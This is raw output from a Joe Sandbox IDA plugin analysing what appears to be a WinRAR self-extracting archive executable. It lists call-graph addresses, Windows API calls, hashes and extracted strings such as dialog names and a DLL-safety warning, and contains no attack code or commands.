calls 26264->26278 26270 7ff7b8f1b575 SetDlgItemTextW 26265->26270 26275 7ff7b8f26834 _invalid_parameter_noinfo_noreturn 31 API calls 26267->26275 26269 7ff7b8f1b77c 26269->26234 26272 7ff7b8f1b7af 26269->26272 26273 7ff7b8f1b7c6 26269->26273 26274 7ff7b8f0a008 58 API calls 26270->26274 26271 7ff7b8f1ad9d 26277 7ff7b8f0a008 58 API calls 26271->26277 26821 7ff7b8ef255c GetWindowTextLengthW 26272->26821 26276 7ff7b8ef8a94 33 API calls 26273->26276 26286 7ff7b8f1b5a7 26274->26286 26280 7ff7b8f1bddf 26275->26280 26299 7ff7b8f1b7bf BuildCatchObjectHelperInternal 26276->26299 26282 7ff7b8f1adc1 26277->26282 26285 7ff7b8f1ace5 26278->26285 26287 7ff7b8f26834 _invalid_parameter_noinfo_noreturn 31 API calls 26280->26287 26288 7ff7b8f0d2bc 48 API calls 26282->26288 26590 7ff7b8f1e8dc 26285->26590 26292 7ff7b8ef12c0 33 API calls 26286->26292 26293 7ff7b8f1bde5 26287->26293 26295 7ff7b8f1add4 26288->26295 26323 7ff7b8f1b5dc 26292->26323 26305 7ff7b8f26834 _invalid_parameter_noinfo_noreturn 31 API calls 26293->26305 26302 7ff7b8f1e8dc 24 API calls 26295->26302 26306 7ff7b8f1b85f 26299->26306 26315 7ff7b8ef1fa8 31 API calls 26299->26315 26308 7ff7b8f1ade4 26302->26308 26304 7ff7b8f1b68b 26313 7ff7b8f0a008 58 API calls 26304->26313 26314 7ff7b8f1bdeb 26305->26314 26327 7ff7b8ef1fa8 31 API calls 26306->26327 26338 7ff7b8f1b872 26306->26338 26317 7ff7b8ef1fa8 31 API calls 26308->26317 26311 7ff7b8f1ae5d 26322 7ff7b8f1ae8b 26311->26322 26801 7ff7b8f0266c 26311->26801 26312 7ff7b8f1ad3f 26312->26311 26800 7ff7b8f1f29c 33 API calls 2 library calls 26312->26800 26325 7ff7b8f1b695 26313->26325 26335 7ff7b8f26834 _invalid_parameter_noinfo_noreturn 31 API calls 26314->26335 26315->26306 26329 7ff7b8f1adf2 26317->26329 26604 7ff7b8f02314 26322->26604 26323->26304 26341 7ff7b8ef12c0 33 API calls 26323->26341 26350 7ff7b8ef12c0 33 API calls 26325->26350 26327->26338 26329->26293 26329->26312 26344 7ff7b8f1bdf1 26335->26344 26338->26234 26351 7ff7b8f1be03 26338->26351 26346 7ff7b8f1b62d 
26341->26346 26355 7ff7b8f26834 _invalid_parameter_noinfo_noreturn 31 API calls 26344->26355 26353 7ff7b8f0a008 58 API calls 26346->26353 26347 7ff7b8f1aebd 26361 7ff7b8f07268 SetCurrentDirectoryW 26347->26361 26348 7ff7b8f1aea5 GetLastError 26348->26347 26372 7ff7b8f1b6ca 26350->26372 26357 7ff7b8f26834 _invalid_parameter_noinfo_noreturn 31 API calls 26351->26357 26352 7ff7b8f1ae7f 26804 7ff7b8f1960c 12 API calls _handle_error 26352->26804 26359 7ff7b8f1b638 26353->26359 26362 7ff7b8f1bdf7 26355->26362 26363 7ff7b8f1be09 26357->26363 26364 7ff7b8ef1170 33 API calls 26359->26364 26366 7ff7b8f1aecf 26361->26366 26374 7ff7b8f26834 _invalid_parameter_noinfo_noreturn 31 API calls 26362->26374 26375 7ff7b8f26834 _invalid_parameter_noinfo_noreturn 31 API calls 26363->26375 26368 7ff7b8f1b650 26364->26368 26370 7ff7b8f1aed6 GetLastError 26366->26370 26371 7ff7b8f1aee5 26366->26371 26383 7ff7b8ef2044 33 API calls 26368->26383 26370->26371 26377 7ff7b8f1af9c 26371->26377 26382 7ff7b8f1afab 26371->26382 26385 7ff7b8f1aefc GetTickCount 26371->26385 26372->26362 26373 7ff7b8f1b729 26372->26373 26378 7ff7b8f1bdfd 26373->26378 26373->26379 26374->26378 26381 7ff7b8f1be0f 26375->26381 26377->26382 26395 7ff7b8f1b415 26377->26395 26386 7ff7b8f26834 _invalid_parameter_noinfo_noreturn 31 API calls 26378->26386 26379->26258 26387 7ff7b8ef26c8 63 API calls 26381->26387 26388 7ff7b8f1b2d1 26382->26388 26392 7ff7b8f05758 34 API calls 26382->26392 26389 7ff7b8f1b66f 26383->26389 26616 7ff7b8ef4cdc 26385->26616 26386->26351 26391 7ff7b8f1be80 26387->26391 26388->26234 26814 7ff7b8ef2830 33 API calls 26388->26814 26393 7ff7b8ef1fa8 31 API calls 26389->26393 26398 7ff7b8f1be84 26391->26398 26403 7ff7b8f1bf26 GetDlgItem SetFocus 26391->26403 26426 7ff7b8f1be9a 26391->26426 26399 7ff7b8f1afcf 26392->26399 26400 7ff7b8f1b67d 26393->26400 26394 7ff7b8f1af11 26411 7ff7b8ef1fa8 31 API calls 26394->26411 26406 7ff7b8f0a008 58 API calls 26395->26406 26410 7ff7b8f21d70 _handle_error 8 API calls 
26398->26410 26805 7ff7b8f0b25c 99 API calls 26399->26805 26405 7ff7b8ef1fa8 31 API calls 26400->26405 26401 7ff7b8f1b2f6 26815 7ff7b8ef1170 26401->26815 26412 7ff7b8f1bf5a 26403->26412 26405->26304 26413 7ff7b8f1b443 SetDlgItemTextW 26406->26413 26409 7ff7b8f1afe9 GetCurrentProcessId 26415 7ff7b8f0d2bc 48 API calls 26409->26415 26416 7ff7b8f1c533 26410->26416 26417 7ff7b8f1af44 26411->26417 26418 7ff7b8ef12c0 33 API calls 26412->26418 26419 7ff7b8ef26a0 26413->26419 26414 7ff7b8f1b30e 26420 7ff7b8f0a008 58 API calls 26414->26420 26421 7ff7b8f1b03e GetCommandLineW 26415->26421 26622 7ff7b8f01534 26417->26622 26423 7ff7b8f1bf6c 26418->26423 26424 7ff7b8f1b461 SetDlgItemTextW GetDlgItem 26419->26424 26425 7ff7b8f1b31b 26420->26425 26427 7ff7b8f1b0d4 26421->26427 26428 7ff7b8f1b0e3 26421->26428 26422 7ff7b8f1bed1 SendDlgItemMessageW 26429 7ff7b8f1befa EndDialog 26422->26429 26430 7ff7b8f1bef1 26422->26430 26833 7ff7b8f0737c 33 API calls 26423->26833 26433 7ff7b8f1b48c GetWindowLongPtrW SetWindowLongPtrW 26424->26433 26434 7ff7b8f1b4b2 26424->26434 26435 7ff7b8ef1170 33 API calls 26425->26435 26426->26398 26426->26422 26436 7ff7b8ef20c0 33 API calls 26427->26436 26806 7ff7b8f1a410 33 API calls _handle_error 26428->26806 26429->26398 26430->26429 26433->26434 26638 7ff7b8f1c9a4 26434->26638 26440 7ff7b8f1b32e 26435->26440 26436->26428 26439 7ff7b8f1bf80 26445 7ff7b8ef2678 SetDlgItemTextW 26439->26445 26446 7ff7b8ef1fa8 31 API calls 26440->26446 26442 7ff7b8f1b0f4 26807 7ff7b8f1a410 33 API calls _handle_error 26442->26807 26443 7ff7b8f1af72 GetLastError 26444 7ff7b8f1af81 26443->26444 26449 7ff7b8f01444 97 API calls 26444->26449 26450 7ff7b8f1bf94 26445->26450 26451 7ff7b8f1b33c 26446->26451 26454 7ff7b8f1af8e 26449->26454 26459 7ff7b8f1bfcb SendDlgItemMessageW FindFirstFileW 26450->26459 26455 7ff7b8ef1fa8 31 API calls 26451->26455 26452 7ff7b8f1c9a4 163 API calls 26456 7ff7b8f1b4db 26452->26456 26453 7ff7b8f1b105 26808 7ff7b8f1a410 33 API calls _handle_error 
26453->26808 26458 7ff7b8ef1fa8 31 API calls 26454->26458 26460 7ff7b8f1b34a 26455->26460 26757 7ff7b8f1f1b4 26456->26757 26458->26377 26463 7ff7b8f1c01f 26459->26463 26560 7ff7b8f1c4a2 26459->26560 26469 7ff7b8f0a008 58 API calls 26460->26469 26462 7ff7b8f1b116 26809 7ff7b8f0b2fc 99 API calls 26462->26809 26471 7ff7b8f0a008 58 API calls 26463->26471 26466 7ff7b8f1c9a4 163 API calls 26479 7ff7b8f1b509 26466->26479 26467 7ff7b8f1b131 26810 7ff7b8f1f3f8 33 API calls 26467->26810 26468 7ff7b8f1c51d 26468->26398 26473 7ff7b8f1b362 26469->26473 26476 7ff7b8f1c042 26471->26476 26472 7ff7b8f1c547 26477 7ff7b8f26834 _invalid_parameter_noinfo_noreturn 31 API calls 26472->26477 26483 7ff7b8ef12c0 33 API calls 26473->26483 26474 7ff7b8f1b535 26819 7ff7b8ef235c GetDlgItem EnableWindow 26474->26819 26475 7ff7b8f1b15a 26482 7ff7b8ef4cdc 33 API calls 26475->26482 26486 7ff7b8ef12c0 33 API calls 26476->26486 26480 7ff7b8f1c54c 26477->26480 26479->26474 26484 7ff7b8f1c9a4 163 API calls 26479->26484 26487 7ff7b8f26834 _invalid_parameter_noinfo_noreturn 31 API calls 26480->26487 26481 7ff7b8f1ac30 26481->26250 26481->26269 26485 7ff7b8f1b177 26482->26485 26494 7ff7b8f1b397 26483->26494 26484->26474 26491 7ff7b8ef1fa8 31 API calls 26485->26491 26488 7ff7b8f1c074 26486->26488 26489 7ff7b8f1c552 26487->26489 26490 7ff7b8ef1170 33 API calls 26488->26490 26495 7ff7b8f26834 _invalid_parameter_noinfo_noreturn 31 API calls 26489->26495 26492 7ff7b8f1c08f 26490->26492 26496 7ff7b8f1b1a2 26491->26496 26497 7ff7b8efd5bc 33 API calls 26492->26497 26493 7ff7b8f1b3f6 26498 7ff7b8ef1fa8 31 API calls 26493->26498 26494->26344 26494->26493 26499 7ff7b8f1c558 26495->26499 26811 7ff7b8ef2c5c 35 API calls _handle_error 26496->26811 26501 7ff7b8f1c0a6 26497->26501 26498->26234 26502 7ff7b8f26834 _invalid_parameter_noinfo_noreturn 31 API calls 26499->26502 26504 7ff7b8ef1fa8 31 API calls 26501->26504 26505 7ff7b8f1c55e 26502->26505 26503 7ff7b8f1b1b7 ShellExecuteExW 26510 7ff7b8f1b1d6 26503->26510 26506 
7ff7b8f1c0b3 26504->26506 26507 7ff7b8f26834 _invalid_parameter_noinfo_noreturn 31 API calls 26505->26507 26506->26480 26508 7ff7b8ef1fa8 31 API calls 26506->26508 26509 7ff7b8f1c564 26507->26509 26511 7ff7b8f1c119 26508->26511 26516 7ff7b8f26834 _invalid_parameter_noinfo_noreturn 31 API calls 26509->26516 26512 7ff7b8f1b207 WaitForInputIdle 26510->26512 26513 7ff7b8f1b234 26510->26513 26514 7ff7b8ef2678 SetDlgItemTextW 26511->26514 26512->26513 26517 7ff7b8f1b21f 26512->26517 26522 7ff7b8ef1fa8 31 API calls 26513->26522 26515 7ff7b8f1c12d FindClose 26514->26515 26518 7ff7b8f1c238 SendDlgItemMessageW 26515->26518 26519 7ff7b8f1c149 26515->26519 26520 7ff7b8f1c56a 26516->26520 26812 7ff7b8ef2f50 15 API calls _handle_error 26517->26812 26525 7ff7b8f1c26c 26518->26525 26834 7ff7b8f19ac4 10 API calls _handle_error 26519->26834 26524 7ff7b8f1b255 26522->26524 26813 7ff7b8ef2c2c DisconnectNamedPipe CloseHandle 26524->26813 26530 7ff7b8f0a008 58 API calls 26525->26530 26526 7ff7b8f1c16c 26528 7ff7b8f0a008 58 API calls 26526->26528 26531 7ff7b8f1c175 26528->26531 26529 7ff7b8f1b263 26529->26314 26532 7ff7b8f1b29d 26529->26532 26533 7ff7b8f1c279 26530->26533 26534 7ff7b8f0d2bc 48 API calls 26531->26534 26535 7ff7b8ef1fa8 31 API calls 26532->26535 26537 7ff7b8ef12c0 33 API calls 26533->26537 26541 7ff7b8f1c192 BuildCatchObjectHelperInternal 26534->26541 26536 7ff7b8f1b2c3 26535->26536 26538 7ff7b8ef1fa8 31 API calls 26536->26538 26540 7ff7b8f1c2ab 26537->26540 26538->26388 26539 7ff7b8ef1fa8 31 API calls 26542 7ff7b8f1c224 26539->26542 26543 7ff7b8ef1170 33 API calls 26540->26543 26541->26489 26541->26539 26544 7ff7b8ef2678 SetDlgItemTextW 26542->26544 26545 7ff7b8f1c2c6 26543->26545 26544->26518 26546 7ff7b8efd5bc 33 API calls 26545->26546 26547 7ff7b8f1c2dd 26546->26547 26548 7ff7b8ef1fa8 31 API calls 26547->26548 26549 7ff7b8f1c2e9 BuildCatchObjectHelperInternal 26548->26549 26550 7ff7b8ef1fa8 31 API calls 26549->26550 26551 7ff7b8f1c323 26550->26551 26552 7ff7b8ef1fa8 31 
API calls 26551->26552 26553 7ff7b8f1c330 26552->26553 26553->26499 26554 7ff7b8ef1fa8 31 API calls 26553->26554 26555 7ff7b8f1c396 26554->26555 26556 7ff7b8ef2678 SetDlgItemTextW 26555->26556 26557 7ff7b8f1c3aa 26556->26557 26557->26560 26835 7ff7b8f19ac4 10 API calls _handle_error 26557->26835 26559 7ff7b8f1c3d5 26561 7ff7b8f0a008 58 API calls 26559->26561 26560->26398 26560->26468 26560->26472 26560->26509 26562 7ff7b8f1c3df 26561->26562 26563 7ff7b8f0d2bc 48 API calls 26562->26563 26565 7ff7b8f1c3fc BuildCatchObjectHelperInternal 26563->26565 26564 7ff7b8ef1fa8 31 API calls 26566 7ff7b8f1c48e 26564->26566 26565->26505 26565->26564 26567 7ff7b8ef2678 SetDlgItemTextW 26566->26567 26567->26560 26569 7ff7b8ef274d 26568->26569 26570 7ff7b8ef26e2 26568->26570 26569->26211 26570->26569 26571 7ff7b8ef270c 26570->26571 26836 7ff7b8f096b4 26570->26836 26571->26569 26573 7ff7b8ef2721 GetDlgItem 26571->26573 26573->26569 26574 7ff7b8ef2734 26573->26574 26574->26569 26575 7ff7b8ef273b SetWindowTextW 26574->26575 26575->26569 26577 7ff7b8ef245c 26576->26577 26578 7ff7b8ef2497 26576->26578 26580 7ff7b8ef12c0 33 API calls 26577->26580 26579 7ff7b8ef255c 35 API calls 26578->26579 26581 7ff7b8ef248d BuildCatchObjectHelperInternal 26579->26581 26580->26581 26582 7ff7b8ef1fa8 31 API calls 26581->26582 26585 7ff7b8ef24ef 26581->26585 26582->26585 26583 7ff7b8ef252e 26584 7ff7b8f21d70 _handle_error 8 API calls 26583->26584 26586 7ff7b8ef2543 26584->26586 26585->26583 26587 7ff7b8ef2556 26585->26587 26586->26234 26586->26241 26586->26481 26588 7ff7b8f26834 _invalid_parameter_noinfo_noreturn 31 API calls 26587->26588 26589 7ff7b8ef255b 26588->26589 26900 7ff7b8f1a624 PeekMessageW 26590->26900 26593 7ff7b8f1e97b SendMessageW SendMessageW 26595 7ff7b8f1e9dc SendMessageW 26593->26595 26596 7ff7b8f1e9c1 26593->26596 26594 7ff7b8f1e92d 26597 7ff7b8f1e939 ShowWindow SendMessageW SendMessageW 26594->26597 26598 7ff7b8f1e9fb 26595->26598 26599 7ff7b8f1e9fe SendMessageW SendMessageW 
26595->26599 26596->26595 26597->26593 26598->26599 26600 7ff7b8f1ea2b SendMessageW 26599->26600 26601 7ff7b8f1ea50 SendMessageW 26599->26601 26600->26601 26602 7ff7b8f21d70 _handle_error 8 API calls 26601->26602 26603 7ff7b8f1acf5 26602->26603 26603->26280 26603->26312 26610 7ff7b8f0245b 26604->26610 26612 7ff7b8f0234a 26604->26612 26605 7ff7b8f21d70 _handle_error 8 API calls 26606 7ff7b8f02471 26605->26606 26606->26347 26606->26348 26607 7ff7b8f02435 26608 7ff7b8f02a30 56 API calls 26607->26608 26607->26610 26608->26610 26609 7ff7b8ef12c0 33 API calls 26609->26612 26610->26605 26612->26607 26612->26609 26613 7ff7b8f02486 26612->26613 26905 7ff7b8f02a30 26612->26905 26614 7ff7b8f26834 _invalid_parameter_noinfo_noreturn 31 API calls 26613->26614 26615 7ff7b8f0248b 26614->26615 26617 7ff7b8ef4d09 26616->26617 26618 7ff7b8ef4d21 26617->26618 26619 7ff7b8ef12c0 33 API calls 26617->26619 26620 7ff7b8f21d70 _handle_error 8 API calls 26618->26620 26619->26618 26621 7ff7b8ef4d58 26620->26621 26621->26394 26623 7ff7b8f0156a 26622->26623 26624 7ff7b8f0159e 26623->26624 26625 7ff7b8f015b1 CreateFileW 26623->26625 26626 7ff7b8f01682 26624->26626 26628 7ff7b8f05d18 49 API calls 26624->26628 26625->26624 26627 7ff7b8ef3cac 33 API calls 26626->26627 26629 7ff7b8f0169f 26627->26629 26630 7ff7b8f0160c 26628->26630 26631 7ff7b8f21d70 _handle_error 8 API calls 26629->26631 26632 7ff7b8f01610 CreateFileW 26630->26632 26633 7ff7b8f01649 26630->26633 26634 7ff7b8f016b4 26631->26634 26632->26633 26633->26626 26635 7ff7b8f016c8 26633->26635 26634->26443 26634->26444 26636 7ff7b8f26834 _invalid_parameter_noinfo_noreturn 31 API calls 26635->26636 26637 7ff7b8f016cd 26636->26637 26735 7ff7b8f1ca1c BuildCatchObjectHelperInternal 26638->26735 26640 7ff7b8f1cd58 26641 7ff7b8ef1fa8 31 API calls 26640->26641 26642 7ff7b8f1cd61 26641->26642 26643 7ff7b8f21d70 _handle_error 8 API calls 26642->26643 26644 7ff7b8f1b4ca 26643->26644 26644->26452 26645 7ff7b8f1e763 27029 7ff7b8ef6ddc 47 API calls 
BuildCatchObjectHelperInternal 26645->27029 26647 7ff7b8ef8a94 33 API calls 26647->26735 26649 7ff7b8f1e769 26650 7ff7b8f26834 _invalid_parameter_noinfo_noreturn 31 API calls 26649->26650 26652 7ff7b8f1e76f 26650->26652 26651 7ff7b8f10ad8 CompareStringW 26651->26735 27030 7ff7b8ef6ddc 47 API calls BuildCatchObjectHelperInternal 26652->27030 26653 7ff7b8f1e757 26654 7ff7b8f26834 _invalid_parameter_noinfo_noreturn 31 API calls 26653->26654 26656 7ff7b8f1e75d 26654->26656 27028 7ff7b8ef6ddc 47 API calls BuildCatchObjectHelperInternal 26656->27028 26658 7ff7b8f1e775 26661 7ff7b8f26834 _invalid_parameter_noinfo_noreturn 31 API calls 26658->26661 26660 7ff7b8f1e6dd 26663 7ff7b8ef3cac 33 API calls 26660->26663 26664 7ff7b8f1e77b 26661->26664 26662 7ff7b8ef13c4 33 API calls 26666 7ff7b8f1d6f8 GetTempPathW 26662->26666 26669 7ff7b8f1e6ed 26663->26669 26672 7ff7b8f26834 _invalid_parameter_noinfo_noreturn 31 API calls 26664->26672 26665 7ff7b8f1e751 27027 7ff7b8ef200c 33 API calls std::_Xinvalid_argument 26665->27027 26666->26735 26668 7ff7b8f055f8 35 API calls 26668->26735 27025 7ff7b8f1a48c 33 API calls 2 library calls 26669->27025 26673 7ff7b8f1e781 26672->26673 26678 7ff7b8f26834 _invalid_parameter_noinfo_noreturn 31 API calls 26673->26678 26675 7ff7b8ef268c SetWindowTextW 26675->26735 26676 7ff7b8f1e703 26681 7ff7b8ef1fa8 31 API calls 26676->26681 26682 7ff7b8f1e71a BuildCatchObjectHelperInternal 26676->26682 26677 7ff7b8f2aaac 43 API calls 26677->26735 26683 7ff7b8f1e787 26678->26683 26680 7ff7b8ef2044 33 API calls 26680->26735 26681->26682 27026 7ff7b8ef1f88 RtlPcToFileHeader RaiseException Concurrency::cancel_current_task std::bad_alloc::bad_alloc 26682->27026 26686 7ff7b8f26834 _invalid_parameter_noinfo_noreturn 31 API calls 26683->26686 26684 7ff7b8f21c20 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 26684->26735 26689 7ff7b8f1e78d 26686->26689 26687 7ff7b8f1a48c 33 API calls 26687->26735 26688 7ff7b8ef3cac 33 API calls 26688->26735 

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: _invalid_parameter_noinfo_noreturn$Console$FileHandle$AddressProcProcess$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadModulePointerReadSleepStringSystemVersionWrite
                                                                                    • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$RpcRtRemote.dll$SSPICLI.DLL$SetDefaultDllDirectories$SetDllDirectoryW$UXTheme.dll$WINNSI.DLL$WindowsCodecs.dll$XmlLite.dll$aclui.dll$apphelp.dll$atl.dll$browcli.dll$cabinet.dll$clbcatq.dll$comres.dll$crypt32.dll$cryptbase.dll$cryptsp.dll$cryptui.dll$cscapi.dll$devrtl.dll$dfscli.dll$dhcpcsvc.dll$dhcpcsvc6.dll$dnsapi.DLL$dsrole.dll$dwmapi.dll$ieframe.dll$imageres.dll$iphlpapi.DLL$kernel32$linkinfo.dll$lpk.dll$mlang.dll$mpr.dll$msasn1.dll$netapi32.dll$netutils.dll$ntmarta.dll$ntshrui.dll$oleaccrc.dll$peerdist.dll$profapi.dll$propsys.dll$psapi.dll$rasadhlp.dll$rsaenh.dll$samcli.dll$samlib.dll$secur32.dll$setupapi.dll$sfc_os.dll$shdocvw.dll$shell32.dll$slc.dll$srvcli.dll$userenv.dll$usp10.dll$uxtheme.dll$version.dll$wintrust.dll$wkscli.dll$ws2_32.dll$ws2help.dll
                                                                                    • API String ID: 1496594111-2013832382
                                                                                    • Opcode ID: 5055fd89619171a3d64a845f42fd249c8978af8e628021f29e591253d8353463
                                                                                    • Instruction ID: baa4a6d09fb0e64eff1111cc7030fec6fb823a882a5bc2f899a59d65645899fa
                                                                                    • Opcode Fuzzy Hash: 5055fd89619171a3d64a845f42fd249c8978af8e628021f29e591253d8353463
                                                                                    • Instruction Fuzzy Hash: CD323031A19B829CE721AF28D8402E9F3A4FF6A355F800236DB5D46769EF3CD256C354
                                                                                    APIs
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: _invalid_parameter_noinfo_noreturn$Item$DialogMessageSendTextWindow
                                                                                    • String ID: %s %s$-el%u -s2 "-d%s" "-sp%s"$@$LICENSEDLG$REPLACEFILEDLG$STARTDLG$__tmp_rar_sfx_access_check_$p$runas$winrarsfxpipe
                                                                                    • API String ID: 2770254507-1933896953
                                                                                    • Opcode ID: 763d24d17ccee29585ed1d86f292851b995c95d668b987f9603427506920234e
                                                                                    • Instruction ID: 4e494b65bb14ce709572f7bacac51c643de1498a125bf4536338a8c1541706c2
                                                                                    • Opcode Fuzzy Hash: 763d24d17ccee29585ed1d86f292851b995c95d668b987f9603427506920234e
                                                                                    • Instruction Fuzzy Hash: 2EE2A671A1968289EA20BB29D4502F9E351FFA7785FC04231DB4D0769EDF3CE646C328
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: .lnk$.tmp$<br>$=$@set:user$HIDE$MAX$MIN$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion$lnk
                                                                                    • API String ID: 0-81786609
                                                                                    • Opcode ID: a99eabaa1f0a77fa1100620014f1fe634b876181f41281ca063998fdf1054e65
                                                                                    • Instruction ID: 1a93b04acf36faaf464bbb4c2c6753a411c920e0f6ef684dbeb0c0764a1de5d5
                                                                                    • Opcode Fuzzy Hash: a99eabaa1f0a77fa1100620014f1fe634b876181f41281ca063998fdf1054e65
                                                                                    • Instruction Fuzzy Hash: ED03A132A1868299FB10FF68C4402ECE771EB62799FD00132EB1D56A9DDF78E586C354

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: EnvironmentVariable_invalid_parameter_noinfo_noreturn$CurrentHandleObject$AddressDeleteDirectoryModuleProc$CloseCommandDialogIconInformationInitializeLineLoadLocalMallocParamProcessSleepTimeUserswprintf
                                                                                    • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$STARTDLG$sfxname$sfxstime$winrarsfxpipe
                                                                                    • API String ID: 2472672504-4073604590
                                                                                    • Opcode ID: 71cecf12ebfe1a4c16647de5c6781db4d0b830b8743af4e4a126b66d11010dd4
                                                                                    • Instruction ID: 5aba3d95fce814300d59a140e1716f6b990fa20a6dcdcc1fe530bb50262f4aa6
                                                                                    • Opcode Fuzzy Hash: 71cecf12ebfe1a4c16647de5c6781db4d0b830b8743af4e4a126b66d11010dd4
                                                                                    • Instruction Fuzzy Hash: 81129672E1878289EA10EF68D8411FDE361BFA6795F800231EB5D06A9DDF7CE542C358

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: Window$Rect$Text$ByteCharClientItemLongMessageMetricsMultiSendSystemWideswprintf
                                                                                    • String ID: $%s:$CAPTION$ComboBox
                                                                                    • API String ID: 3712066475-505312980
                                                                                    • Opcode ID: 6a909236ad96c565540c89ef6bc63b6bd32faa10e6ebb83ac9eee940cfc6341d
                                                                                    • Instruction ID: a41fabb4b0ef12e168e8ff13583329c6790c0cf8ba24ba21d12970681c7749bb
                                                                                    • Opcode Fuzzy Hash: 6a909236ad96c565540c89ef6bc63b6bd32faa10e6ebb83ac9eee940cfc6341d
                                                                                    • Instruction Fuzzy Hash: CCB1E432B186414EE718EF2DA8006AAE761FB96785F844135EF9D47B5DDE3CE502CB10

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
                                                                                    • String ID: PNG
                                                                                    • API String ID: 211097158-364855578
                                                                                    • Opcode ID: 99d0e2308b5a7d8505ac282d5f273e060b141aa6daacbcea06e7be9776bc6a34
                                                                                    • Instruction ID: 6c0f4681e021950d6b87214c08d9c0e2e138ecca82d7a28d1279fbe962e341c5
                                                                                    • Opcode Fuzzy Hash: 99d0e2308b5a7d8505ac282d5f273e060b141aa6daacbcea06e7be9776bc6a34
                                                                                    • Instruction Fuzzy Hash: 89413031A19B068AEE04AB19D444379E3A0EF9AF92F840135DF0D4736CEF7CE4468364

                                                                                    Control-flow Graph

call 7ff7b8f03244 2247->2262 2249 7ff7b8efeb92-7ff7b8efeba5 2248->2249 2250 7ff7b8efebab call 7ff7b8f21c5c 2248->2250 2249->2250 2255 7ff7b8efed1c-7ff7b8efed23 call 7ff7b8f26834 2249->2255 2250->2247 2252->2253 2252->2255 2253->2245 2259 7ff7b8efec64-7ff7b8efec77 2254->2259 2260 7ff7b8efec7d call 7ff7b8f21c5c 2254->2260 2259->2260 2263 7ff7b8efed16-7ff7b8efed1b call 7ff7b8f26834 2259->2263 2260->2211 2262->2240 2263->2255
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: \
                                                                                    • API String ID: 0-2967466578
                                                                                    Similarity
                                                                                    • API ID: _invalid_parameter_noinfo_noreturn
                                                                                    • String ID: __tmp_reference_source_
                                                                                    • API String ID: 3668304517-685763994
                                                                                    Similarity
                                                                                    • API ID: FileFind$ErrorFirstLast_invalid_parameter_noinfo_noreturn$Next
                                                                                    • String ID:
                                                                                    • API String ID: 474548282-0
                                                                                    Similarity
                                                                                    • API ID: File$CreateErrorLast$Time_invalid_parameter_noinfo_noreturn
                                                                                    • String ID:
                                                                                    • API String ID: 3536497005-0
                                                                                    Similarity
                                                                                    • API ID: _invalid_parameter_noinfo_noreturn
                                                                                    • String ID: CMT
                                                                                    • API String ID: 3668304517-2756464174
                                                                                    Similarity
                                                                                    • API ID: _invalid_parameter_noinfo_noreturn
                                                                                    • String ID:
                                                                                    • API String ID: 3668304517-0
                                                                                    Similarity
                                                                                    • API ID: CompareString_invalid_parameter_noinfo_noreturn
                                                                                    • String ID:
                                                                                    • API String ID: 1017591355-0
                                                                                    Similarity
                                                                                    • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                                                    • String ID:
                                                                                    • API String ID: 3340455307-0
                                                                                    • Opcode ID: a32e6ea11df6d9526cd90f5d70a51f62bbf855f107e67f4d70b6b7828c839f25
                                                                                    • Instruction ID: f2291bcb26d6fc9e3c2a659158545d49294759ba3117ac1ac70104001373679d
                                                                                    • Opcode Fuzzy Hash: a32e6ea11df6d9526cd90f5d70a51f62bbf855f107e67f4d70b6b7828c839f25
                                                                                    • Instruction Fuzzy Hash: 81412732B156564EEB64EF29A91076AE252BB96784F844030DF1E07798CE3CE447871C
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmp
